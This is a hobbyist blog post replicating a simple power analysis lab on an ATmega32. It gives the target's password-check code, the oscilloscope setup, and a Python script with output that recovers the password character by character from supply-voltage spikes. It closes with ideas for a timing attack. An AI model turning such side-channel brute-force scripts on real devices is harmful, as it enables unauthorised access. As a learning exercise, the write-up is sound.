SPA Attack Experiment 1

In late 2021 a book named “Hardware Hacking Handbook” was published. I don’t remember exactly how I came across it, but after checking the ToC and some friend feedback, I’ve decided to buy it. I quickly looked at the contents and stumbled on chapter 9, which includes a simple power analysis lab experiment. It’s an introduction to power analysis, and I was curious to do it in practice. Then, why not write about my experience replicating that lab?

During my high school and first University years, I’ve already spent some time playing with ATMEL microcontrollers. Even though I’ve been a bit distant from this scene, I’ve followed some of the Arduino evolution. Thus, the lab apparatus wasn’t entirely new to me, but the experiment was!

Scenario

This lab is a microcontroller asking for a password through a serial port. The attack vector uses the power supply noise and (somehow) learns about the correct password. This type of attack is not new; according to the book, they date back to the late ’90s, in the context of cryptography side-channel attacks. However, the exponential proliferation of microcontrollers and computers around us will make these types of attacks increasingly common.

Power Analysis

As mentioned, the attack relies on analyzing the power consumption signal of a target device using a reasonable precise probe. One of the easiest ways of doing this (although there are others), is using a shunt resistor between the target and the power source, as shown in the following drawing:

We then measure the voltage drop in the shunt resistor (Rs), and by Ohm’s law, we can get the current flowing into the target:

To avoid using a differential oscilloscope which is more expensive, one could measure the two voltage potentials of the resistor and subtract to get the voltage drop. However, this can be further simplified by assuming that the voltage source (Vcc) is ideal and constant; we use a single probe and measure the negative potential V- voltage to ground and subtract that from an ideal Vcc to ground:

So, the current consumption analysis can be done by capturing the voltage at the negative node of the resistor. We’d expect that this voltage would show some differences when the correct character of the password is used compared to incorrect password characters.

Simplifying

Measuring the current consumption is very reliable and should give the most accurate results. Alternatively, we can also measure the voltage variations caused by small and fast current sinks on the target. This is only possible because we’re in a real-world that doesn’t have ideal power sources: they take time to reestablish the voltage from current sink variations. That’s one of the reasons to use decoupling capacitors at the power source rails. These help keep the voltage as stable as possible.

That said, I won’t be measuring the current variations but instead voltage source noise. We need to get rid of any capacitor on the power source rails to do this. Initially, I was using the STK500 programmer board with external Vtarget, but I missed that even this rail was connected to some smoothing capacitors. Thus, any voltage noise information was being wiped by the capacitors.

Now, we need to power the target somehow. Without capacitors on the power line, it means that switching converters (buck, boost, and variants) will inject unwanted noise in our captured signal. Alternatively, we could use a linear voltage regulator (with lower noise), but I had none at hand.

So the solution I used was a cleaner power supply... what’s the basic noise clean power supply we know? A battery or power cells. So, I’ve connected 3xAAA power cells to get around 4.5V, which was sufficient to power my target microcontroller.

Lab Preparation

I used the following parts:

Digital Scope (I used PicoScope 2406B, 1GS/s, 32MS)
ATmega32 microcontroller
USB to Serial converter (FTDI)
3xAAA power cells
AVR programmer board (STK500, but any will do)
Breadboard and a few wires

The lab setup is basic and described in the following diagram:

After mounting this setup, it looks like the following picture (the power from power cells is disconnected just to avoid wasting battery):

Before we can perform the experiments on noise analysis, we need to prepare the target. That’s described in the next section.

Target Software

I’ve used the same sample code as the one from the book with a few changes:

Removed the random delays;
Added trigger pin to low code right after the comparison.

Since it’s my first experiment, I wanted to confirm I was seeing the signal noise at the right time and not, for example, missing data because I didn’t capture enough time. Even though we shouldn’t have these shortcuts in a realistic scenario, other hacks can be done to help overcome these limitations (some ideas are shared in the end).

The code used for the target was the following (based on code from the book):

// Trigger is PB0 (pin 1)
int triggerPin = PB0;
String known_passwordstr = String("ilovecheese");
String input_passwordstr;

char input_password[20];
char tempchr;
int index;

// the setup routine runs once when you press reset:
void setup() {
  // initialize serial communication at 9600 bits per second:
  Serial.begin(9600);
  pinMode(triggerPin, OUTPUT);
  tempchr = '0';
  index = 0;
}

// the loop routine runs over and over again forever:
void loop() {
  //Wait a little bit after startup & clear everything
  digitalWrite(triggerPin, LOW);
  delay(250);
  Serial.flush();
  Serial.write("Enter Password:");
  // wait for last character
  while ((tempchr != '\n') && (index < 19)) {
    if (Serial.available() > 0) {
      tempchr = Serial.read();
      input_password[index++] = tempchr;
    }
  }
  // Null terminate and strip non-characters
  input_password[index] = '\0';
  input_passwordstr = String(input_password);
  input_passwordstr.trim();
  index = 0;
  tempchr = 0;
  digitalWrite(triggerPin, HIGH);
  if (input_passwordstr == known_passwordstr) {
    digitalWrite(triggerPin, LOW);
    Serial.write("Password OK\n");
  } else {
    digitalWrite(triggerPin, LOW);
    //Delay up to 500ms randomly
    //delay(random(500));
    Serial.write("Password Bad\n");
  }
}

It’s worth mentioning that the password comparison line will call String.equals() and this operator code is the following (taken from here):

...
unsigned char String::equals(const String &s2) const
{
  return (len == s2.len && compareTo(s2) == 0);
}
...

It first compares both strings length, then it calls compareTo function. The latter will then use strcmp which is known to be inadequate for comparing passwords. This means that one part of the attack (not explored in this post) is to find the correct password size.

Refer to Appendix A for information on how I’ve programmed the target. I felt it was a bit off-topic to include in the main text. Once the target is programmed, we’re ready to do the first tests.

First tests and results...

I’ve used a Linux serial client (screen, minicom, etc.) to test if the target is working as expected. To communicate with the target, we need to ensure the baud rate is set to 9600. Then I typed a few characters until the password buffer was filled and waited for the response.

Once I verified that the serial communication was working as expected, I made the first captures from the oscilloscope. I’ve used channel A for the voltage noise capture (AC mode, 100mV, 2u to 5u) and channel B for the trigger (DC mode, 10V, 2V trigger on rising edge).

The following graph shows the voltage noise for two passwords attempts: aaaaaaaaaaa (represented by “V(a)”) and iaaaaaaaaaa (represented by “V(i)”). I’ve included the trigger signals which allow us to see approximately when the comparison ends.

To avoid having too much information in the time graph, I’ve cropped it before 16us. Both signals are very similar from the trigger and start of the capture until around the 18us. The grid spacing matches 8MHz, the same as the target instruction cycle period (most of the target instructions take a single cycle). From this preliminary time graph, we can already make a couple of comments.

It was surprising to me to find that the noise signals are very similar for the same internal target behavior. I was expecting more noise, more differences between the signals!
Even though we passed 11 characters in length, we know that the comparison ends at the first different character found. This means we won’t see the voltage noise for all characters comparison in the graph, and we have to guess one password character at the time.
We can see that the trigger lowering for iaaaaaaaaaa password happens later, which is in line with a string comparison that went a bit further in the target. Thus, it takes around 8 clock cycles between two characters in comparison.
The exit path of the comparison (comparison function return and trigger switch) should use similar instructions. Hence, we can see two identical voltage signals but having a time offset ...

Can you spot where the string comparison deviates? It seems right after the 18us, as shown in the following time chart C1 mark.

We can see that the pair of spikes is lower when the password character is correct. To help confirm this hypothesis, we can look at the signals for all other wrong characters (A-Z except I), and see that the behavior is the same: they all have a pair of spikes above 2V in this time region.

Moving to the next character, we have the exact same behavior as shown in the following graph: approximately 8 clock cycles after the first comparison (in C2), we see the two distinct spikes again:

To have better confidence on these spikes being related to the comparison, we can confirm from the assembly listing if the number of cycles between a character comparison is around 8. Refer to Appendix A for this analysis.

To implement a brute force algorithm, we should look for data points above ~2V at specific periods in time, given by t, for the particular character index n, given the target clock period C:

I’ve used the following Python script to programmatically brute-force the password.

# spacode_crack.py, based on scripts from the book.
import serial
import time
#picoscope module from https://github.com/colinoflynn/pico-python
from picoscope import ps2000a
import string
import sys

def fill_pass(pw):
    if len(pw) < 11:
        return pw + "a"*(11 - len(pw))
    else:
        return pw

def build_pass(cur_pw, idx):
    return fill_pass(cur_pw + string.ascii_lowercase[idx])

V_THRESHOLD=2.1
def test_capture(data, cur_n, sample_period):
    C=1/(8e6)*1e6;
    idx_low = round((18+8*C*cur_n)/(sample_period*1e6))
    idx_high = round((18+8*C*cur_n + 2*C)/(sample_period*1e6))

    for i in range(idx_low,idx_high):
        if data[i] > V_THRESHOLD:
            return False

    # We had no voltage peaks related to different character, means this is potentially the correct one.
    return True

#Adjust serial port as needed
try:
    ser = serial.Serial(
        port='/dev/ttyUSB0',
        baudrate=9600,
        timeout=0.500
    )
    ps = ps2000a.PS2000a()
    print("Found the following picoscope:")
    print(ps.getAllUnitInfo())

    # Need at least 30us from trigger (8MHz ATMEL)
    obs_duration = 35E-6

    # Sample at least 5000 points within that window
    sampling_interval = obs_duration / 5000

    # Cut-off for HP filter
    freq1 = 400e3
    # Cut-off for LP filter
    freq2 = 16e6

    # Turn channels C and D off
    ps.setChannel('C', enabled=False)
    ps.setChannel('D', enabled=False)

    # Configure timebase
    (actualSamplingInterval, nSamples, maxSamples) = \
    ps.setSamplingInterval(sampling_interval, obs_duration)
    print("Sampling interval = %f us" % (actualSamplingInterval * nSamples * 1E6))

    # Channel B is the trigger
    ps.setChannel('B', 'DC', 10.0, 0.0, enabled=True, BWLimited=True)
    ps.setSimpleTrigger('B', 2.0, 'Rising', delay=10, timeout_ms=5000, enabled=True)

    # 50mV range on channel B, AC coupled, 20MHz BW limit
    ps.setChannel('A', 'AC', 1, 0.0, enabled=True, BWLimited=True)

    data_list = []
    cur_pass = ""
    cur_n = 0

    #Clear system
    ser.write(("abcde\n").encode("utf-8"))
    ser.read(128)

    while True:
        # Try next character
        found = False
        for idx in range(len(string.ascii_lowercase)):
            pw_test = build_pass(cur_pass, idx)
            #print("Testing password: %s" % pw_test)
            ps.runBlock()
            time.sleep(0.05)

            ser.write((pw_test + "\n").encode("utf-8"))
            ps.waitReady()
            r=ser.read(128)
            #print("Got response: %s" % r)
            if b'Password OK' in r:
                print("Found password: " + pw_test)
                sys.exit(0)

            data = ps.getDataV('A', nSamples, returnOverflow=False)
            data = -1.0 * (data - np.mean(data)) / np.std(data)
            if test_capture(data, cur_n, actualSamplingInterval) == True:
                found = True
                cur_pass = cur_pass + string.ascii_lowercase[idx]
                cur_n += 1
                print("Current password: " + cur_pass)
                break

            # Continue trying another character.
        if not found:
            print("Error: failed to find the correct character at offset %d!" % cur_n)
            sys.exit(-1)

finally:
    #Always close off things
    ser.close()
    ps.stop()
    ps.close()

The output after a few trial and errors was:

Found the following picoscope:
DriverVersion                 : PS2000A Linux Driver, 2.1.78.3011
...
timebase = 2
timebase_dt = 4e-09
noSamples = 8750
Sampling interval = 35.000000 us
Current password: i
Current password: il
Current password: ilo
Current password: ilov
Current password: ilove
Current password: ilovec
Current password: ilovech
Current password: iloveche
Current password: ilovechee
Current password: ilovechees
Found password: ilovecheese
$

It’s not printing all the attempts, but you can easily enable those. I had to try a few times (3..4) until it completely matched the password. The code is very simple and doesn’t use any technique to be more tolerant of electrical errors and deviations. For example, we could use the average of a sample of several captures for the same character attempt instead of using a single capture.

Final Words

This experiment was just a proof-of-concept: a few simplifications were used, deviating a bit from real-world scenarios. For instance, it wasn’t described how we could find the correct password size. There is a trigger signal to help know when the password comparison starts. I also used this signal to locate the end of the comparison more accurately, even though this information won’t be used in the brute-force script.

However, overcoming these difficulties shouldn’t be impossible either. There are always ways, techniques, and little hacks that can be done to help. I can think of the following for two problems:

For the trigger signal, used to know when the comparison is about to start. We know that as soon as we send the carriage return of the password, it will receive the character and compare the password. We would be capturing the signal a bit early and would probably need to extend the capture period until we learn where the comparison is made.

I think a timing attack could be used to find the correct password length. When the password matches the correct length, the code will call strcmp, which will delay the “Password Bad” response. By comparing the “Password Bad” response time, it might be possible to know when the correct password size is used.

Nevertheless, it was a fun challenge, and I look forward to doing other hardware security experiences.

Cheers!

Appendix A

Preparing the Target

First we need to install the Arduino core for the corresponding chip model. Arduino does not directly support all Atmel chips. Fortunately, the community has ported the Arduino Core for many other Atmel chips include those I had stored during my University years in my electronics parts boxes. I had several spare microcontrollers but the one that I found to be working was an Atmega32.

To install the Arduino core we search for one port in Google that leads us to:

https://github.com/MCUdude/MightyCore

We first add this core index URL to the local Arduino configuration:

$ arduino-cli config add board_manager.additional_urls \
https://mcudude.github.io/MightyCore/package_MCUdude_MightyCore_index.json

Now we refresh the index with:

$ arduino-cli core update-index
Updating index: package_index.json downloaded                                                                                                                
Updating index: package_index.json.sig downloaded                                                                                                            
Updating index: package_drazzy.com_index.json downloaded                                                                                                     
Updating index: package_MCUdude_MightyCore_index.json downloaded

Let’s confirm we now have support for Atmega32 with:

$ arduino-cli core search atmega32
ID                   Version Name                    
atmel-avr-xminis:avr 0.6.0   Atmel AVR Xplained-minis
MightyCore:avr       2.1.3   MightyCore

We request Arduino to download the core stuff with:

$ arduino-cli core install MightyCore:avr
Tool arduino:[email protected] already installed
Tool arduino:[email protected] already installed
Tool arduino:[email protected] already installed
Downloading packages...
MightyCore:[email protected] downloaded                                                                                                                              
Installing platform MightyCore:[email protected]...
Configuring platform....
Platform MightyCore:[email protected] installed

Alright, now I didn’t need to install the bootloader because I will use ICSP directly to program the microcontroller. When we use arduino-cli compile/upload ... command it will already include the bootloader in the binary as will be shown next.

Compiling

First we grab the Lab1 code from the Hardware Hacking Handbook and put it in a Arduino source code file (I called mine PsaSketch):

Now we run the arduino-cli command to compile, providing the chip information:

$ arduino-cli compile -b MightyCore:avr:32:clock=8MHz_internal PsaSketch.ino

We’re ready to upload the code to the chip.

Uploading Code

You can use any programmer you prefer, I’m just sharing what I’ve used, STK500. I don’t think it should be very common used board now-a-days, probably easier to use a USBAsp or Arduino-ISP programming. But it really doesn’t matter as long as you can program the chip.

Now I’m using STK500 to program the chip, the following description only applies if you’re using the same board... you may skip for the next section. I’ve to connect two headers of ISP6Pin to SPROG3 (the red one that will have ATmega32 plugged), as shown with the arrow in the following picture:

The square highlight connection is for the spare RS232 connection and the circle highlight is to connect the “trigger” led (PB0).

Now that the board is ready, we can call the Arduino cli tool to upload the binary:

$ arduino-cli upload -b MightyCore:avr:32:clock=8MHz_internal \
-P stk500 -p /dev/ttyUSB0 -v .
...
avrdude: Version 6.3-20201216
         Copyright (c) 2000-2005 Brian Dean, http://www.bdmicro.com/
         Copyright (c) 2007-2014 Joerg Wunsch

...
         Using Port                    : /dev/ttyUSB0
         Using Programmer              : stk500
         AVR Part                      : ATmega32
         Chip Erase delay              : 9000 us
         PAGEL                         : PD7
         BS2                           : PA0
         RESET disposition             : dedicated
         RETRY pulse                   : SCK
         serial program mode           : yes
         parallel program mode         : yes
         Timeout                       : 200
         StabDelay                     : 100
         CmdexeDelay                   : 25
         SyncLoops                     : 32
         ByteDelay                     : 0
         PollIndex                     : 3
         PollValue                     : 0x53
         Memory Detail                 :

                                  Block Poll               Page                       Polled
           Memory Type Mode Delay Size  Indx Paged  Size   Size #Pages MinW  MaxW   ReadBack
           ----------- ---- ----- ----- ---- ------ ------ ---- ------ ----- ----- ---------
           eeprom         4    10    64    0 no       1024    4      0  9000  9000 0xff 0xff
           flash         33     6    64    0 yes     32768  128    256  4500  4500 0xff 0xff
           lfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
           hfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
           efuse          0     0     0    0 no          0    0      0     0     0 0x00 0x00
           lock           0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
           signature      0     0     0    0 no          3    0      0     0     0 0x00 0x00
           calibration    0     0     0    0 no          4    0      0     0     0 0x00 0x00

         Programmer Type : STK500V2
         Description     : Atmel STK500
         Programmer Model: STK500
         Hardware Version: 2
         Firmware Version Master : 2.10
         Topcard         : Unknown
         Vtarget         : 5.1 V
         SCK period      : 35.3 us
         Varef           : 3.2 V
         Oscillator      : 3.686 MHz

avrdude: AVR device initialized and ready to accept instructions

Reading | ################################################## | 100% 0.01s

avrdude: Device signature = 0x1e9502 (probably m32)
avrdude: NOTE: "flash" memory has been specified, an erase cycle will be performed
         To disable this feature, specify the -D option.
avrdude: erasing chip
avrdude: reading input file "/tmp/arduino-sketch-AFA799AD3D8937B186F6188F7AC20AAA/PsaSketch.ino.with_bootloader.hex"
avrdude: writing flash (32768 bytes):

Writing | ################################################## | 100% 6.97s

avrdude: 32768 bytes of flash written

avrdude done.  Thank you.

As soon as we upload the code, we can see the led light on (the chip code starts running right away). This happens because VTARGET jumper on this board is shorted, thus we’re powering the chip directly from the STK500.

Appendix B

Assembly Instructions

The piece of code that performs the comparison of the characters can be analyzed from the target binary disassembly, at strcmp function:

strcmp():
    102c:       fb 01           movw    r30, r22       ; Z=r31:r30
    102e:       dc 01           movw    r26, r24       ; X=r27:r26
    1030:       8d 91           ld      r24, X+        ; r24=X, X+=1 (2C)
    1032:       01 90           ld      r0, Z+         ; r0=Z, Z+=1 (2C)
    1034:       80 19           sub     r24, r0        ; r24-=r0 (1C)
    1036:       01 10           cpse    r0, r1         ; if r0 == 0 ? (!1C,2C)
    1038:       d9 f3           breq    .-10           ; 0x1030 <strcmp+0x4>
    103a:       99 0b           sbc     r25, r25       ; r25=r25-r25=0
103c:       08 95           ret

If we imagine a trace from the cpse instruction, we count between 7 to 8 clock cycles:

cpse, since the condition is false, it will execute the next instruction and consume one clock cycle;
next instruction is breq and will always happen (?? not clear why) and takes two clock cycles;
then, two ld instructions that take four clock cycles;
the subtraction which takes one clock cycle;
...and we reach again the cpse instruction, after 8 clock cycles.

References

https://learn.sparkfun.com/tutorials/installing-an-arduino-bootloader/all

https://docs.arduino.cc/built-in-examples/arduino-isp/ArduinoToBreadboard